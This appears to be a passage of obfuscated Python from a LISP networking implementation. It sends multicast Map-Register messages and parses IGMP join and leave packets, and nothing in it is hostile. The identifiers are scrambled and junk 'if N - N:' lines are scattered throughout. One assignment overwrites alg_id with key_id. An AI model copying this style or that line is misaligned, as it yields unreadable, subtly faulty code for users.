if 23 - 23: i1I1ii1II1iII + OoOO0ooOOoo0O . oOo0O0Ooo * oo + oOoO0oo0OOOo
if 18 - 18: oooO0oo0oOOOO * Ooo00oOo00o . oooO0oo0oOOOO / O0
if 8 - 8: Ooo00oOo00o
if 4 - 4: oOoO0oo0OOOo + oOoO0oo0OOOo * Oo - oOo0O0Ooo
if 78 - 78: o0000oOoOoO0o / II111iiii % oOo0O0Ooo
if 52 - 52: II11iiII - i1I1ii1II1iII * iiiiIi11i
if 17 - 17: OoooooooOO + II11iiII * OoOO0ooOOoo0O * oOo0O0Ooo
if 36 - 36: O0 + OoO0O00
if 5 - 5: OoO0O00 * oOo0O0Ooo
def iIIIiIii ( lisp_sockets , entries ) :
ii1I11iIiIII1 = len ( entries )
if ( ii1I11iIiIII1 == 0 ) : return
if 52 - 52: Ooo00oOo00o * oooO0oo0oOOOO + oOo0O0Ooo
IiiiIiiI = None
if ( entries [ 0 ] [ 1 ] . find ( ":" ) != - 1 ) : IiiiIiiI = lisp . LISP_AFI_IPV6
if ( entries [ 0 ] [ 1 ] . find ( "." ) != - 1 ) : IiiiIiiI = lisp . LISP_AFI_IPV4
if ( entries [ 0 ] [ 1 ] . find ( "-" ) != - 1 ) : IiiiIiiI = lisp . LISP_AFI_MAC
if ( IiiiIiiI == None ) :
lisp . lprint ( "lisp_send_multicast_map_register() invalid group address" )
return
if 72 - 72: i1IIi
if 82 - 82: oOo0O0Ooo + OoooooooOO / i11iIiiIii * oOoO0oo0OOOo . OoooooooOO
if 63 - 63: oOoO0oo0OOOo
if 6 - 6: Oo / oOoO0oo0OOOo
if 57 - 57: OoOO0ooOOoo0O
if 67 - 67: ooOO00oOo . Oo
oO00oOo0OOO = [ ]
for II1iIi11 , i1111IIiii1 , ii1 in entries :
if ( II1iIi11 != None ) : continue
oO00oOo0OOO . append ( [ i1111IIiii1 , ii1 ] )
if 51 - 51: O0 . iiiiIi11i + i11iIiiIii
if 79 - 79: oOo0O0Ooo . iiiiIi11i . oooO0oo0oOOOO % o0000oOoOoO0o
entries = [ ]
for i1111IIiii1 , ii1 in oO00oOo0OOO :
OoOo00 = None
for o0OO0oOO0O0 in lisp . lisp_group_mapping_list . values ( ) :
O00OOOo0 = OoO ( i1111IIiii1 , o0OO0oOO0O0 )
if ( O00OOOo0 == - 1 ) : continue
if ( OoOo00 == None or O00OOOo0 > OoOo00 . group_prefix . mask_len ) :
OoOo00 = o0OO0oOO0O0
if 39 - 39: o0000oOoOoO0o % O0 % oOo0O0Ooo . i1IIi
if 86 - 86: ooOO00oOo * OoooooooOO
if ( OoOo00 == None ) :
lisp . lprint ( "No group-mapping for {}, could be underlay group" . format ( i1111IIiii1 ) )
if 71 - 71: iIii1I11I1II1 - II11iiII . oo % OoooooooOO + II11iiII
continue
if 26 - 26: OoO0O00 + II11iiII / ooOO00oOo % oOo0O0Ooo % oOoO0oo0OOOo + II111iiii
if 31 - 31: OoOO0ooOOoo0O % II11iiII * OoOO0ooOOoo0O
lisp . lprint ( "Use group-mapping '{}' {} for group {}" . format ( OoOo00 . group_name , OoOo00 . group_prefix . print_prefix ( ) , i1111IIiii1 ) )
if 45 - 45: i1IIi . oo + II11iiII - OoooooooOO % Oo
II1I = OoOo00 . group_prefix . instance_id
oO0Oo = OoOo00 . use_ms_name
i1I = OoOo00 . rle_address
if 7 - 7: i11iIiiIii . OoO0O00
if ( len ( OoOo00 . sources ) == 0 ) :
entries . append ( [ "0.0.0.0" , i1111IIiii1 , II1I , oO0Oo , i1I , ii1 ] )
continue
if 99 - 99: OoOO0ooOOoo0O - o0oo0o - iiiiIi11i % ooOO00oOo
for o0O00oOoOO in OoOo00 . sources :
entries . append ( [ o0O00oOoOO , i1111IIiii1 , II1I , oO0Oo , i1I , ii1 ] )
if 21 - 21: II111iiii % oOoO0oo0OOOo . i1IIi - OoooooooOO
if 4 - 4: OoooooooOO . Oo
if 78 - 78: oOoO0oo0OOOo + OoOO0ooOOoo0O - O0
ii1I11iIiIII1 = len ( entries )
if ( ii1I11iIiIII1 == 0 ) : return
if 10 - 10: o0oo0o % oo
lisp . lprint ( "Build Map-Register for {} multicast entries" . format ( ii1I11iIiIII1 ) )
if 97 - 97: OoooooooOO - o0oo0o
if 58 - 58: iIii1I11I1II1 + O0
if 30 - 30: Oo % i1I1ii1II1iII * II11iiII - oOoO0oo0OOOo * o0000oOoOoO0o % Oo
if 46 - 46: i11iIiiIii - O0 . iiiiIi11i
if 100 - 100: oo / Ooo00oOo00o * i1I1ii1II1iII . O0 / II11iiII
if 83 - 83: o0oo0o
ii111Ii11iii = lisp . lisp_rle_node ( )
ii111Ii11iii . level = 128
o00 = lisp . lisp_get_any_translated_rloc ( )
i1I = lisp . lisp_rle ( "" )
i1I . rle_nodes . append ( ii111Ii11iii )
if 67 - 67: Ooo00oOo00o % oOo0O0Ooo . oOo0O0Ooo - Oo
if 90 - 90: Oo + II111iiii * oOoO0oo0OOOo / o0000oOoOoO0o . Ooo00oOo00o + Ooo00oOo00o
if 40 - 40: Oo / oOo0O0Ooo % i11iIiiIii % oOoO0oo0OOOo / oo
if 62 - 62: i1IIi - oOo0O0Ooo
if 62 - 62: i1IIi + OoO0O00 % oooO0oo0oOOOO
I1iiIIIi11 = { }
for O0O0O in lisp . lisp_map_servers_list . values ( ) :
I1iiIIIi11 [ O0O0O . ms_name ] = [ "" , 0 ]
if 28 - 28: oOoO0oo0OOOo . i1IIi
if 10 - 10: ooOO00oOo / OoO0O00
I1i = None
if ( lisp . lisp_nat_traversal ) : I1i = lisp . lisp_hostname
if 50 - 50: Ooo00oOo00o * o0000oOoOoO0o % oOoO0oo0OOOo / OoO0O00 - O0 % i1I1ii1II1iII
if 48 - 48: oo + oOoO0oo0OOOo + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * iiiiIi11i - o0000oOoOoO0o / II11iiII + OoOO0ooOOoo0O + oooO0oo0oOOOO
if 39 - 39: iIii1I11I1II1 - OoooooooOO
oO0oooooo = 0
for OooooOoooO in lisp . lisp_rtr_list . values ( ) :
if ( OooooOoooO == None ) : continue
oO0oooooo += 1
if 65 - 65: oooO0oo0oOOOO + OoO0O00
if 59 - 59: OoooooooOO + OoOO0ooOOoo0O . o0oo0o - O0 % iIii1I11I1II1 / O0
if 88 - 88: OoO0O00 . O0 % OoooooooOO / II11iiII
if 89 - 89: II111iiii / iiiiIi11i
if 14 - 14: II11iiII . oo * Oo + II111iiii - Oo + II11iiII
o00o0 = ""
for II1iIi11 , i1111IIiii1 , II1I , oO0Oo , IIIIIiII1 , ii1 in entries :
if 45 - 45: oo / i1I1ii1II1iII . i1I1ii1II1iII
if 35 - 35: o0oo0o . oOo0O0Ooo * i11iIiiIii
if 44 - 44: i11iIiiIii / OoO0O00
if 42 - 42: OoooooooOO + OoO0O00 % II111iiii + ooOO00oOo
if ( I1iiIIIi11 . has_key ( oO0Oo ) == False ) : continue
if 24 - 24: i1I1ii1II1iII * II111iiii % i1I1ii1II1iII % oooO0oo0oOOOO + OoooooooOO
II1I1I1Ii = lisp . lisp_eid_record ( )
II1I1I1Ii . rloc_count = 1 + oO0oooooo
II1I1I1Ii . authoritative = True
II1I1I1Ii . record_ttl = lisp . LISP_REGISTER_TTL if ii1 else 0
II1I1I1Ii . eid = lisp . lisp_address ( IiiiIiiI , II1iIi11 , 0 , II1I )
if ( II1I1I1Ii . eid . address == 0 ) : II1I1I1Ii . eid . mask_len = 0
II1I1I1Ii . group = lisp . lisp_address ( IiiiIiiI , i1111IIiii1 , 0 , II1I )
if ( II1I1I1Ii . group . is_mac_broadcast ( ) and II1I1I1Ii . eid . address == 0 ) : II1I1I1Ii . eid . mask_len = 0
if 29 - 29: II111iiii - OoooooooOO - i11iIiiIii . Ooo00oOo00o
if 19 - 19: II111iiii
lisp . lprint ( " EID-prefix {} for ms-name '{}'" . format ( lisp . green ( II1I1I1Ii . print_eid_tuple ( ) , False ) , oO0Oo ) )
if 72 - 72: OoooooooOO / oo + o0000oOoOoO0o / oOo0O0Ooo * o0000oOoOoO0o
if 34 - 34: O0 * O0 % OoooooooOO + i1I1ii1II1iII * iIii1I11I1II1 % o0000oOoOoO0o
o00o0 += II1I1I1Ii . encode ( )
II1I1I1Ii . print_record ( " " , False )
I1iiIIIi11 [ oO0Oo ] [ 1 ] += 1
if 25 - 25: OoOO0ooOOoo0O + oOo0O0Ooo . Ooo00oOo00o % oOo0O0Ooo * II11iiII
if 32 - 32: i11iIiiIii - o0oo0o
if 53 - 53: OoooooooOO - oooO0oo0oOOOO
if 87 - 87: iiiiIi11i . oo
iII1ii1 = lisp . lisp_rloc_record ( )
iII1ii1 . rloc_name = I1i
if 17 - 17: o0000oOoOoO0o . i11iIiiIii
if 5 - 5: oOoO0oo0OOOo + O0 + O0 . o0oo0o - Oo
if 63 - 63: iiiiIi11i
if 71 - 71: i1IIi . o0000oOoOoO0o * i1I1ii1II1iII % OoooooooOO + II11iiII
if 36 - 36: oooO0oo0oOOOO
if 49 - 49: II11iiII / OoooooooOO / oo
if ( o00 != None ) :
ii111Ii11iii . address = o00
elif ( IIIIIiII1 != None ) :
ii111Ii11iii . address = IIIIIiII1
else :
ii111Ii11iii . address = IIIIIiII1 = lisp . lisp_myrlocs [ 0 ]
if 74 - 74: o0oo0o % oOoO0oo0OOOo
if 7 - 7: II111iiii
iII1ii1 . rle = i1I
iII1ii1 . local_bit = True
iII1ii1 . reach_bit = True
iII1ii1 . priority = 255
iII1ii1 . weight = 0
iII1ii1 . mpriority = 1
iII1ii1 . mweight = 100
o00o0 += iII1ii1 . encode ( )
iII1ii1 . print_record ( " " )
if 27 - 27: iiiiIi11i . OoooooooOO + i11iIiiIii
if 86 - 86: OoOO0ooOOoo0O / Ooo00oOo00o - Ooo00oOo00o + oOoO0oo0OOOo + iiiiIi11i
if 33 - 33: Ooo00oOo00o . i1I1ii1II1iII . oooO0oo0oOOOO . i1IIi
if 49 - 49: oOoO0oo0OOOo
if 84 - 84: OoOO0ooOOoo0O - OoO0O00 / O0 - o0oo0o
for OooooOoooO in lisp . lisp_rtr_list . values ( ) :
if ( OooooOoooO == None ) : continue
iII1ii1 = lisp . lisp_rloc_record ( )
iII1ii1 . rloc . copy_address ( OooooOoooO )
iII1ii1 . priority = 254
iII1ii1 . rloc_name = "RTR"
iII1ii1 . weight = 0
iII1ii1 . mpriority = 255
iII1ii1 . mweight = 0
iII1ii1 . local_bit = False
iII1ii1 . reach_bit = True
o00o0 += iII1ii1 . encode ( )
iII1ii1 . print_record ( " RTR " )
if 21 - 21: O0 * O0 % oOoO0oo0OOOo
if 94 - 94: OoOO0ooOOoo0O + II111iiii % i11iIiiIii
if 8 - 8: Oo * O0
if 73 - 73: Ooo00oOo00o / iiiiIi11i / OoOO0ooOOoo0O / ooOO00oOo
if 11 - 11: oOo0O0Ooo + oooO0oo0oOOOO - OoooooooOO / ooOO00oOo
I1iiIIIi11 [ oO0Oo ] [ 0 ] += o00o0
if 34 - 34: Oo
if 45 - 45: Oo / OoO0O00 / o0000oOoOoO0o
if 44 - 44: oOoO0oo0OOOo - o0000oOoOoO0o / II111iiii * ooOO00oOo * OoO0O00
if 73 - 73: Ooo00oOo00o - oo * i1IIi / i11iIiiIii * II11iiII % II111iiii
if 56 - 56: OoooooooOO * OoO0O00 . OoO0O00 . oOoO0oo0OOOo
OoO0ooO = lisp . lisp_map_register ( )
OoO0ooO . nonce = 0xaabbccdddfdfdf00
OoO0ooO . xtr_id_present = True
OoO0ooO . proxy_reply_requested = True
OoO0ooO . map_notify_requested = False
OoO0ooO . merge_register_requested = True
if 24 - 24: OoO0O00 . OoOO0ooOOoo0O * o0000oOoOoO0o % i1I1ii1II1iII / II11iiII
if 58 - 58: oo - oOoO0oo0OOOo % O0 . oo % ooOO00oOo % oooO0oo0oOOOO
if 87 - 87: iiiiIi11i - i11iIiiIii
if 78 - 78: i11iIiiIii / iIii1I11I1II1 - Ooo00oOo00o
for O0O0O in lisp . lisp_map_servers_list . values ( ) :
if 23 - 23: OoOO0ooOOoo0O
if 40 - 40: Ooo00oOo00o - II111iiii / OoO0O00
if 14 - 14: oOoO0oo0OOOo
if 5 - 5: Ooo00oOo00o . iIii1I11I1II1 % iIii1I11I1II1
if ( I1iiIIIi11 . has_key ( O0O0O . ms_name ) == False ) : continue
if 56 - 56: OoooooooOO - OoOO0ooOOoo0O - i1IIi
if 8 - 8: o0oo0o / II11iiII . oo + oOoO0oo0OOOo / i11iIiiIii
if 31 - 31: Oo - iIii1I11I1II1 + i1I1ii1II1iII . OoO0O00 / oooO0oo0oOOOO % iIii1I11I1II1
if 6 - 6: oooO0oo0oOOOO * i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + Ooo00oOo00o / i1IIi
OoO0ooO . record_count = I1iiIIIi11 [ O0O0O . ms_name ] [ 1 ]
if ( OoO0ooO . record_count == 0 ) : continue
if 53 - 53: OoOO0ooOOoo0O + iIii1I11I1II1
OoO0ooO . nonce += 1
OoO0ooO . alg_id = O0O0O . alg_id
OoO0ooO . alg_id = O0O0O . key_id
OoO0ooO . xtr_id = O0O0O . xtr_id
OoO0ooO . site_id = O0O0O . site_id
OoO0ooO . encrypt_bit = ( O0O0O . ekey != None )
OO0 = OoO0ooO . encode ( )
OoO0ooO . print_map_register ( )
if 70 - 70: oOoO0oo0OOOo
if 67 - 67: OoooooooOO
if 29 - 29: O0 - i11iIiiIii - II111iiii + II11iiII * oooO0oo0oOOOO
if 2 - 2: i1IIi - Oo + oo . Ooo00oOo00o * Ooo00oOo00o / oOo0O0Ooo
if 93 - 93: i1IIi
ooo000o0ooO0 = OoO0ooO . encode_xtr_id ( "" )
OO0 = OO0 + o00o0 + ooo000o0ooO0
if 53 - 53: OoooooooOO + OoO0O00 + iiiiIi11i
O0O0O . map_registers_multicast_sent += 1
lisp . lisp_send_map_register ( lisp_sockets , OO0 , OoO0ooO , O0O0O )
if 24 - 24: i1I1ii1II1iII - oooO0oo0oOOOO - i1I1ii1II1iII * oOoO0oo0OOOo . OoooooooOO / oooO0oo0oOOOO
if 66 - 66: OoO0O00
if 97 - 97: i1IIi - OoooooooOO / o0oo0o * oo
if 55 - 55: Ooo00oOo00o . i1I1ii1II1iII
O0O0O . resolve_dns_name ( )
if 87 - 87: Ooo00oOo00o % iIii1I11I1II1
if 100 - 100: o0oo0o . oo * o0oo0o - oo . OoOO0ooOOoo0O * o0000oOoOoO0o
if 89 - 89: ooOO00oOo + oooO0oo0oOOOO * o0oo0o
if 28 - 28: OoooooooOO . iiiiIi11i % oOoO0oo0OOOo / i1IIi / II11iiII
time . sleep ( .001 )
if 36 - 36: Ooo00oOo00o + OoOO0ooOOoo0O - oooO0oo0oOOOO + iIii1I11I1II1 + OoooooooOO
return
if 4 - 4: II111iiii . OoOO0ooOOoo0O + o0000oOoOoO0o * o0oo0o . Oo
if 87 - 87: oOo0O0Ooo / ooOO00oOo / i11iIiiIii
if 74 - 74: iiiiIi11i / oOoO0oo0OOOo % Ooo00oOo00o
if 88 - 88: oOo0O0Ooo - i11iIiiIii % Ooo00oOo00o * OoOO0ooOOoo0O + oOoO0oo0OOOo
if 52 - 52: II111iiii . oo + oOo0O0Ooo % ooOO00oOo
oo0O0o00 = { 1 : "include-mode" , 2 : "exclude-mode" ,
3 : "change-to-include" , 4 : "change-to-exclude" , 5 : "allow-new-source" ,
6 : "block-old-sources" }
if 70 - 70: ooOO00oOo
if 46 - 46: OoOO0ooOOoo0O - i1IIi
if 46 - 46: o0oo0o % o0000oOoOoO0o
if 72 - 72: iIii1I11I1II1
if 45 - 45: OoO0O00 - Ooo00oOo00o % o0oo0o
if 38 - 38: o0oo0o % II11iiII - OoooooooOO
if 87 - 87: ooOO00oOo % oo
if 77 - 77: iIii1I11I1II1 - i1IIi . iiiiIi11i
if 26 - 26: Ooo00oOo00o * oooO0oo0oOOOO . i1IIi
if 59 - 59: O0 + i1IIi - Ooo00oOo00o
if 62 - 62: i11iIiiIii % II11iiII . oooO0oo0oOOOO . II11iiII
if 84 - 84: i11iIiiIii * ooOO00oOo
if 18 - 18: II11iiII - o0000oOoOoO0o - oOo0O0Ooo / o0oo0o - O0
if 30 - 30: O0 + oOoO0oo0OOOo + II111iiii
if 14 - 14: Ooo00oOo00o / II11iiII - iIii1I11I1II1 - iiiiIi11i % Oo
if 49 - 49: Oo * iiiiIi11i / Ooo00oOo00o / OoO0O00 * iIii1I11I1II1
if 57 - 57: oOo0O0Ooo - iiiiIi11i / Oo % i11iIiiIii
if 3 - 3: i1I1ii1II1iII . Oo % oo + oOoO0oo0OOOo
if 64 - 64: i1IIi
if 29 - 29: Ooo00oOo00o / i11iIiiIii / oo % iiiiIi11i % i11iIiiIii
if 18 - 18: II11iiII + o0oo0o
if 80 - 80: iiiiIi11i + Ooo00oOo00o * o0000oOoOoO0o + ooOO00oOo
if 75 - 75: OoOO0ooOOoo0O / Ooo00oOo00o / II11iiII / oooO0oo0oOOOO % Oo + II111iiii
if 4 - 4: i1I1ii1II1iII - OoO0O00 - oooO0oo0oOOOO - OoOO0ooOOoo0O % i11iIiiIii / ooOO00oOo
if 50 - 50: Oo + i1IIi
if 31 - 31: o0000oOoOoO0o
if 78 - 78: i11iIiiIii + Ooo00oOo00o + o0oo0o / Ooo00oOo00o % iIii1I11I1II1 % oooO0oo0oOOOO
if 83 - 83: iIii1I11I1II1 % oOo0O0Ooo % Ooo00oOo00o % o0oo0o . oOoO0oo0OOOo % O0
if 47 - 47: Ooo00oOo00o
if 66 - 66: oo - oooO0oo0oOOOO
if 33 - 33: oo / ooOO00oOo
if 12 - 12: II111iiii
if 2 - 2: i1IIi - oo + OoOO0ooOOoo0O . II111iiii
if 25 - 25: iiiiIi11i
if 34 - 34: oOo0O0Ooo . iIii1I11I1II1 % O0
if 43 - 43: oOoO0oo0OOOo - i1I1ii1II1iII
if 70 - 70: i1I1ii1II1iII / II11iiII % Oo - o0000oOoOoO0o
if 47 - 47: i1I1ii1II1iII
if 92 - 92: II11iiII + oOo0O0Ooo % i1IIi
if 23 - 23: o0oo0o - II11iiII + o0000oOoOoO0o - oOo0O0Ooo * oOo0O0Ooo . OoO0O00
if 47 - 47: iiiiIi11i % iIii1I11I1II1
if 11 - 11: oo % o0000oOoOoO0o - ooOO00oOo - iiiiIi11i + Ooo00oOo00o
if 98 - 98: i1I1ii1II1iII + o0000oOoOoO0o - ooOO00oOo
if 79 - 79: II11iiII / o0oo0o . oOo0O0Ooo - oOoO0oo0OOOo
if 47 - 47: OoooooooOO % O0 * i1I1ii1II1iII . o0000oOoOoO0o
if 38 - 38: O0 - oooO0oo0oOOOO % o0oo0o
if 64 - 64: iIii1I11I1II1
if 15 - 15: oOoO0oo0OOOo + II11iiII / oOoO0oo0OOOo / o0oo0o
if 31 - 31: Oo + O0 + Oo . iIii1I11I1II1 + OoO0O00 / Ooo00oOo00o
if 6 - 6: OoO0O00 % oooO0oo0oOOOO * OoOO0ooOOoo0O / oo + OoO0O00
if 39 - 39: oOo0O0Ooo - OoO0O00 / i1I1ii1II1iII * OoooooooOO
if 100 - 100: O0 . OoOO0ooOOoo0O . ooOO00oOo + O0 * iiiiIi11i
if 42 - 42: iiiiIi11i % OoooooooOO + Ooo00oOo00o
if 56 - 56: OoooooooOO + oOoO0oo0OOOo - i1I1ii1II1iII
if 24 - 24: Ooo00oOo00o + Oo + OoOO0ooOOoo0O - iIii1I11I1II1
if 49 - 49: OoOO0ooOOoo0O . Oo * oOo0O0Ooo % oooO0oo0oOOOO . O0
if 48 - 48: O0 * o0000oOoOoO0o - O0 / o0000oOoOoO0o + oOo0O0Ooo
if 52 - 52: ooOO00oOo % o0000oOoOoO0o * II111iiii
if 4 - 4: OoOO0ooOOoo0O % O0 - OoooooooOO + Oo . iiiiIi11i % II111iiii
if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
if 18 - 18: ooOO00oOo . II111iiii % oOo0O0Ooo % o0000oOoOoO0o
if 87 - 87: iIii1I11I1II1 . OoooooooOO * oOo0O0Ooo
if 100 - 100: ooOO00oOo / i1IIi - oo % o0000oOoOoO0o - iIii1I11I1II1
if 17 - 17: OoOO0ooOOoo0O / Ooo00oOo00o % OoO0O00
if 71 - 71: oooO0oo0oOOOO . o0oo0o . ooOO00oOo
if 68 - 68: i11iIiiIii % iiiiIi11i * ooOO00oOo * oooO0oo0oOOOO * II111iiii + O0
if 66 - 66: OoOO0ooOOoo0O % oOoO0oo0OOOo % OoooooooOO
if 34 - 34: Ooo00oOo00o / i1I1ii1II1iII % O0 . ooOO00oOo . i1IIi
if 29 - 29: O0 . o0oo0o
if 66 - 66: iiiiIi11i * iIii1I11I1II1 % iIii1I11I1II1 * oooO0oo0oOOOO - Oo - oooO0oo0oOOOO
if 70 - 70: o0oo0o + iiiiIi11i
if 93 - 93: o0oo0o + o0000oOoOoO0o
if 33 - 33: O0
if 78 - 78: O0 / II111iiii * ooOO00oOo
if 50 - 50: OoooooooOO - iIii1I11I1II1 + i1IIi % o0oo0o - iIii1I11I1II1 % O0
def o0oO0Oo ( packet ) :
global Oo0o0000o0o0
if 71 - 71: Ooo00oOo00o - oOo0O0Ooo * i1I1ii1II1iII + o0000oOoOoO0o % i11iIiiIii - Oo
oOO0o0 = lisp . bold ( "Receive" , False )
lisp . lprint ( "{} {}-byte IGMP packet: {}" . format ( oOO0o0 , len ( packet ) ,
lisp . lisp_format_packet ( packet ) ) )
if 82 - 82: o0oo0o - II11iiII + ooOO00oOo
if 64 - 64: Ooo00oOo00o . O0 * o0000oOoOoO0o + OoooooooOO - OoO0O00 . OoooooooOO
if 70 - 70: OoO0O00 - iiiiIi11i . iIii1I11I1II1 % OoOO0ooOOoo0O / oOo0O0Ooo - O0
if 55 - 55: i1I1ii1II1iII - ooOO00oOo
o0i1I11iI1iiI = ( struct . unpack ( "B" , packet [ 0 ] ) [ 0 ] & 0x0f ) * 4
if 48 - 48: OoOO0ooOOoo0O . OoooooooOO . oo . oOo0O0Ooo % oOoO0oo0OOOo / i1I1ii1II1iII
if 11 - 11: i1IIi % ooOO00oOo % i1I1ii1II1iII
if 99 - 99: Oo / iIii1I11I1II1 - o0000oOoOoO0o * oOoO0oo0OOOo % oo
if 13 - 13: ooOO00oOo
O0oo0O0 = packet [ o0i1I11iI1iiI : : ]
iiII111iIII1Ii = struct . unpack ( "B" , O0oo0O0 [ 0 ] ) [ 0 ]
i1111IIiii1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 19 - 19: iiiiIi11i * oo % i11iIiiIii
iiI1Ii1I = ( iiII111iIII1Ii in ( 0x12 , 0x16 , 0x17 , 0x22 ) )
if ( iiI1Ii1I == False ) :
i11Ii1iIiII = "{} ({})" . format ( iiII111iIII1Ii , IiII1IiiIiI1 [ iiII111iIII1Ii ] ) if IiII1IiiIiI1 . has_key ( iiII111iIII1Ii ) else iiII111iIII1Ii
if 81 - 81: OoOO0ooOOoo0O . OoooooooOO * oOo0O0Ooo % oooO0oo0oOOOO . OoOO0ooOOoo0O
lisp . lprint ( "IGMP type {} not supported" . format ( i11Ii1iIiII ) )
return
if 60 - 60: II11iiII / oo
if 78 - 78: OoOO0ooOOoo0O . oooO0oo0oOOOO
if ( len ( O0oo0O0 ) < 8 ) :
lisp . lprint ( "IGMP message too small" )
return
if 38 - 38: oOo0O0Ooo + oooO0oo0oOOOO
if 15 - 15: OoO0O00 + OoOO0ooOOoo0O . Oo - iIii1I11I1II1 / O0 % iIii1I11I1II1
if 86 - 86: oo / iiiiIi11i * o0000oOoOoO0o
if 64 - 64: Oo / O0 * oOo0O0Ooo * Oo
if 60 - 60: OoOO0ooOOoo0O / i1IIi % oOoO0oo0OOOo / oOoO0oo0OOOo * oOoO0oo0OOOo . i11iIiiIii
if 99 - 99: oOo0O0Ooo
i1111IIiii1 . address = socket . ntohl ( struct . unpack ( "II" , O0oo0O0 [ : 8 ] ) [ 1 ] )
oO00OoOo = i1111IIiii1 . print_address_no_iid ( )
if 74 - 74: II111iiii . O0 - oo + oooO0oo0oOOOO % i11iIiiIii % oOo0O0Ooo
if 78 - 78: o0000oOoOoO0o + oOo0O0Ooo + oooO0oo0oOOOO - oooO0oo0oOOOO . i11iIiiIii / ooOO00oOo
if 27 - 27: o0000oOoOoO0o - O0 % OoOO0ooOOoo0O * o0oo0o . oooO0oo0oOOOO % iIii1I11I1II1
if 37 - 37: OoooooooOO + O0 - i1IIi % Oo
if ( iiII111iIII1Ii == 0x17 ) :
lisp . lprint ( "IGMPv2 leave (*, {})" . format ( lisp . bold ( oO00OoOo , False ) ) )
iIIIiIii ( Oo0o0000o0o0 ,
[ [ None , oO00OoOo , False ] ] )
return
if 24 - 24: oOo0O0Ooo
if ( iiII111iIII1Ii in ( 0x12 , 0x16 ) ) :
lisp . lprint ( "IGMPv{} join (*, {})" . format ( 1 if ( iiII111iIII1Ii == 0x12 ) else 2 , lisp . bold ( oO00OoOo , False ) ) )
if 94 - 94: i1IIi * i1IIi % II111iiii + II11iiII
if 28 - 28: oo
if 49 - 49: OoOO0ooOOoo0O . Ooo00oOo00o % iiiiIi11i / o0000oOoOoO0o
if 95 - 95: O0 * oOo0O0Ooo * oooO0oo0oOOOO . Oo / iIii1I11I1II1
if 28 - 28: oooO0oo0oOOOO + iiiiIi11i - Oo / iIii1I11I1II1 - oo
if ( oO00OoOo . find ( "224.0.0." ) != - 1 ) :
lisp . lprint ( "Suppress registration for link-local groups" )
else :
iIIIiIii ( Oo0o0000o0o0 ,
[ [ None , oO00OoOo , True ] ] )
if 45 - 45: O0 / i1IIi * iiiiIi11i * ooOO00oOo
if 35 - 35: oOoO0oo0OOOo / i1I1ii1II1iII % oo + iIii1I11I1II1
if 79 - 79: oOo0O0Ooo / Oo
if 77 - 77: OoO0O00
if 46 - 46: o0oo0o
return
if 72 - 72: i1I1ii1II1iII * II11iiII
if 67 - 67: i1IIi
if 5 - 5: II111iiii . OoooooooOO
if 57 - 57: oo
if 35 - 35: OoooooooOO - o0oo0o / ooOO00oOo
iii11i1 = i1111IIiii1 . address
O0oo0O0 = O0oo0O0 [ 8 : : ]
if 48 - 48: Oo * oOoO0oo0OOOo
II111iIiI1Ii = "BBHI"
Ii1iiII1i = struct . calcsize ( II111iIiI1Ii )
oO00O = "I"
IIiI11 = struct . calcsize ( oO00O )
II1iIi11 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 9 - 9: Oo + II111iiii % Oo % oooO0oo0oOOOO + iIii1I11I1II1
if 59 - 59: i1IIi
if 48 - 48: O0 * o0000oOoOoO0o * ooOO00oOo . ooOO00oOo * OoOO0ooOOoo0O - o0000oOoOoO0o
if 14 - 14: oOoO0oo0OOOo + i11iIiiIii
OOOoo = [ ]
for OO in range ( iii11i1 ) :
if ( len ( O0oo0O0 ) < Ii1iiII1i ) : return
III1II1iii1i , O0OO0oOO , ooooO , oO0O0 = struct . unpack ( II111iIiI1Ii ,
O0oo0O0 [ : Ii1iiII1i ] )
if 19 - 19: o0000oOoOoO0o
O0oo0O0 = O0oo0O0 [ Ii1iiII1i : : ]
if 55 - 55: II11iiII % II11iiII / O0 % i1I1ii1II1iII - Ooo00oOo00o . OoO0O00
if ( oo0O0o00 . has_key ( III1II1iii1i ) == False ) :
lisp . lprint ( "Invalid record type {}" . format ( III1II1iii1i ) )
continue
if 49 - 49: iIii1I11I1II1 * i1IIi . OoooooooOO
if 90 - 90: Ooo00oOo00o % oOoO0oo0OOOo - iIii1I11I1II1 % oOo0O0Ooo
IIiI11I1I1i1i = oo0O0o00 [ III1II1iii1i ]
ooooO = socket . ntohs ( ooooO )
i1111IIiii1 . address = socket . ntohl ( oO0O0 )
oO00OoOo = i1111IIiii1 . print_address_no_iid ( )
if 86 - 86: i1IIi
lisp . lprint ( "Record type: {}, group: {}, source-count: {}" . format ( IIiI11I1I1i1i , oO00OoOo , ooooO ) )
if 13 - 13: O0
if 70 - 70: o0000oOoOoO0o . i11iIiiIii % o0000oOoOoO0o . O0 - iIii1I11I1II1
if 26 - 26: II11iiII
if 76 - 76: i1IIi * OoooooooOO * O0 + o0oo0o * o0oo0o
if 35 - 35: Ooo00oOo00o
if 73 - 73: O0 - oOoO0oo0OOOo
if 2 - 2: II111iiii / o0oo0o
ii1 = False
if ( III1II1iii1i in ( 1 , 5 ) ) : ii1 = True
if ( III1II1iii1i == 4 and ooooO == 0 ) : ii1 = True
OoOoO0oOOooo = "join" if ( ii1 ) else "leave"
if 99 - 99: iIii1I11I1II1
if 14 - 14: oOoO0oo0OOOo % oo . II111iiii . oo - Oo
if 45 - 45: oooO0oo0oOOOO / O0 / oOo0O0Ooo * II11iiII
if 18 - 18: iIii1I11I1II1 + II11iiII + iIii1I11I1II1 . oOoO0oo0OOOo + o0oo0o . Oo
if ( oO00OoOo . find ( "224.0.0." ) != - 1 ) :
lisp . lprint ( "Suppress registration for link-local groups" )
continue
if 7 - 7: oOoO0oo0OOOo + iIii1I11I1II1 * OoOO0ooOOoo0O * OoOO0ooOOoo0O / II111iiii - o0000oOoOoO0o
if 65 - 65: iiiiIi11i + oOo0O0Ooo + II111iiii
if 77 - 77: II111iiii
if 50 - 50: O0 . O0 . Oo % OoO0O00
if 68 - 68: iiiiIi11i
if 10 - 10: o0000oOoOoO0o
if 77 - 77: II11iiII / II111iiii + oooO0oo0oOOOO + Oo - i11iIiiIii
if 44 - 44: oo + oOo0O0Ooo + oOoO0oo0OOOo . oo * oOo0O0Ooo % iIii1I11I1II1
if ( ooooO == 0 ) :
OOOoo . append ( [ None , oO00OoOo , ii1 ] )
